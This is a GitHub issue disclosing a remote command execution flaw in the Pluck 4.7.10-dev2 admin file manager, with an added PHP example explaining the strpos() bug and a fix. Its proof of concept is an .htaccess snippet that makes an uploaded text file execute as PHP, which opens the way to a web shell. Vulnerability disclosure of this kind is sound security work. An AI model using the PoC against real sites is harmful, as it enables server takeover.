
Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability in the management file interface. #83

Closed
@Lilc1

Description

@Lilc1

Vulnerability location:
/data/inc/file.php line:42
If the file name is '.htaccess', the strpos function returns a result of 0.
Demo:
Upload these two files in the management file interface.

Access /files/1.txt.
Successful execution.
Then upload attack code.
Successfully obtained the shell.
Poc:

.htaccess
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
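The root cause the report points at is PHP's falsy zero: strpos() returns 0 when the needle sits at offset 0, and a plain truthiness test treats that as "not found". The following is an added illustration, not Pluck's own code; the function names and the shape of the check are assumptions, showing the weak comparison beside the corrected one.

```php
<?php
// Added example (not Pluck's code): the strpos() falsy-zero pitfall behind this report.
// is_blocked_filename_weak() is a hypothetical reconstruction of the kind of check the
// report describes; is_blocked_filename_fixed() shows the corrected comparison.

function is_blocked_filename_weak(string $name): bool
{
    // strpos() returns 0 when '.htaccess' is at offset 0, and 0 is falsy in PHP,
    // so a file literally named ".htaccess" slips through this check.
    return (bool) strpos($name, '.htaccess');
}

function is_blocked_filename_fixed(string $name): bool
{
    // Compare the result against false with === and match case-insensitively,
    // so both ".htaccess" and ".HTACCESS" are caught.
    $base = strtolower(basename($name));
    if (stripos($base, '.htaccess') !== false) {
        return true;
    }
    // Assumption: also reject any other dotfile, since the web server may
    // interpret some of them as configuration.
    return $base !== '' && $base[0] === '.';
}

// Constructed sample names to exercise both checks.
$samples = ['.htaccess', 'x.htaccess', 'notes.txt', '.HTACCESS'];
foreach ($samples as $s) {
    printf("%-12s weak=%s fixed=%s\n", $s,
        is_blocked_filename_weak($s) ? 'blocked' : 'ALLOWED',
        is_blocked_filename_fixed($s) ? 'blocked' : 'allowed');
}
```

Running it shows the weak check letting ".htaccess" and ".HTACCESS" through while the fixed check rejects both; only "notes.txt" is allowed by the corrected version.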
